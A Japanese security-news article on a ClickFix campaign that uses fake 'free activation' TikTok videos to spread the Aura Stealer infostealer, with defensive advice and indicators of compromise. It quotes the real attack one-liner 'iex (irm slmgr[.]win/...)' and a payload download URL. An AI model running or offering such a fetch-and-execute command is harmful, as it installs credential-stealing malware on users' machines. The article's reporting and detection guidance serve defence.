1. セキュリティ対策ラボ
  2. セキュリティニュース
  3. 情報セキュリティ
  4. TikTokで「無料アクティベーション」を装うClickFix(クリックフィックス)が拡大-マルウェアをインストールさせるサイバー攻撃

TikTokで「無料アクティベーション」を装うClickFix(クリックフィックス)が拡大-マルウェアをインストールさせるサイバー攻撃

セキュリティニュース

投稿日時: 更新日時:

TikTokで「無料アクティベーション」を装うClickFix(クリックフィックス)が拡大-マルウェアをインストールさせるサイバー攻撃

サイバー犯罪者が、WindowsやMicrosoft 365、Adobe Premiere・Photoshop、CapCut Pro、Discord Nitroの無料アクティベーションをうたうTikTok 動画を使い、情報窃取型マルウェア(インフォスティーラー)を拡散しています。

ISC HandlerのXavier Mertens氏が継続中のキャンペーンを確認しており、2025年5月にトレンドマイクロがTikTokで観測した手口と同種のサイバー攻撃が続いています。

手口:PowerShellの一行コマンドを実行させる

動画は「管理者としてPowerShellで次の一行を実行」と促します。表示される例は以下のような形式で、偽装しているソフト名に合わせて末尾が変わります。

動画は正規製品の有効化(アクティベーション)を装うほか、NetflixやSpotify Premiumといった架空の無料化手順にも言及します。視聴者が簡単な修正や裏技だと誤認し、コマンドをコピー&ペーストしてしまう点が狙いです。

動画での悪意のある動作誘導はプラットフォーマーからも検知され辛く、自然にユーザーを誘導できるため今後も流行する手口となっています。

画像:bleepingcomputer

iex (irm slmgr[.]win/photoshop)

このコマンドを実行すると、PowerShellが slmgr[.]win に接続して追加スクリプトを取得・実行します。

続いてCloudflare Pages上のホストから2つの実行ファイルをダウンロードします。

  • https://file-epq[.]pages[.]dev/updater.exe … Aura Stealer の亜種

  • source.exe … .NETのVisual C# Compiler(csc.exe)で自己コンパイルしたコードをメモリ内で起動(目的は不明)

インフォステーラーがダウンロードされる

Aura Stealerは、以下のようなデータを収集して攻撃者に送信します。

  • ブラウザに保存されたID・パスワード

  • 認証クッキー

  • 暗号資産ウォレット情報

  • 各種アプリケーションの資格情報 など

これにより、各種オンラインアカウントへの不正アクセスや資産窃取のリスクが生じます。

ClickFixとは

ClickFixとは2024年に確認された新しいタイプのソーシャルエンジニアリング攻撃です。

名称は、ユーザーのクリック(Click)操作と、システムの不具合を修正(Fix)するという口実を組み合わせた初期の手口に由来します。

この攻撃の最大の特徴は、フィッシングサイトへ誘導し、被害者自身に悪意のあるコマンドを実行させる点にあります。一般的に、ユーザーのコマンド実行はセキュリティソフトやEDRをすり抜ける為、マルウェアがダウンロードされてもすぐに検知する事ができません。

影響を受けた可能性がある場合の初動

  • すべての認証情報が侵害された前提で対応し、利用するサービスのパスワードを即時に変更する

  • 可能なサービスでは多要素認証(MFA)を有効化(フィッシング耐性方式を推奨)

  • 端末をフルスキャンし、挙動が不審な場合は再インストールも検討

  • 重要なセッション(Webメール、クラウド管理コンソール等)は強制ログアウトし、再ログイン時にパスワード・MFAを更新

企業向けの緩和策(運用でできる対処)

  • EDR/AVやPowerShellロギングで iexInvoke-RestMethod (irm) の連携実行を検知・制限

  • DNS/プロキシで slmgr[.]win*.pages[.]dev からの実行ファイル取得に警戒(正規用途との誤検知に留意して監視・審査)

  • メール・チャットで共有されるコマンドのコピー&ペーストを禁じるポリシーと教育を徹底

  • .NET csc.exe の不審呼び出しやメモリ内実行を振る舞い検知の条件に追加

IOC/注意すべき文字列(例)

  • ドメイン:slmgr[.]win

  • ダウンロード先:file-epq[.]pages[.]dev/updater.exesource.exe

  • コマンド例:iex (irm slmgr[.]win/<製品名>)

  • 典型的TTP:PowerShell経由のスクリプト取得→実行ファイル2本の取得→Aura Stealer実行/csc.exeでの自己コンパイルとメモリ注入

出典

TikTok videos continue to push infostealers in ClickFix attacks

関連記事

サイバー攻撃の対応 人材不足 障壁はセキュリティ人材は“勝てば官軍、負ければ罪人”という現実サイバー攻撃の対応 人材不足 障壁はセキュリティ人材は“勝てば官軍、負ければ罪人”という現実 EDRSilencerがエンドポイントセキュリティを回避する手段に悪用EDRSilencerがエンドポイントセキュリティを回避する手段に悪用 ISMSクラウドセキュリティ認証とは?クラウドサービスの安全性を証明する認証制度を解説ISMSクラウドセキュリティ認証とは?クラウドサービスの安全性を証明する認証制度を解説 TikTokがマルウェアの温床に?AI生成動画でインフォスティーラー拡散させるサイバー攻撃の手口TikTokがマルウェアの温床に?AI生成動画でインフォスティーラーを拡散させるサイバー攻撃の手口 ハッカーがPHPの脆弱性を悪用し、日本を標的にサイバー攻撃を実行(CVE-2024-4577)ハッカーがPHPの脆弱性を悪用し、日本を標的にサイバー攻撃を実行(CVE-2024-4577) 東急ホテルズ&リゾーツ、宿泊予約システム委託先での不正アクセスによる個人情報漏洩の可能性を発表東急ホテルズ&リゾーツ、宿泊予約システム委託先での不正アクセスによる個人情報漏洩の可能性を発表 DDoS攻撃とは?攻撃事例や防御策を解説DDoS攻撃とは?攻撃事例や防御策を解説 ClickFix(クリックフィックス)の実像をMicrosoftが発表-人間確認を装ってコマンド実行を誘う新手のソーシャルエンジニアリングClickFix(クリックフィックス)の実像をMicrosoftが発表-新手のサイバー攻撃の実態とは ISMS クラウドセキュリティ認証を取得するメリット・デメリットを解説ISMS クラウドセキュリティ認証を取得するメリット・デメリットを解説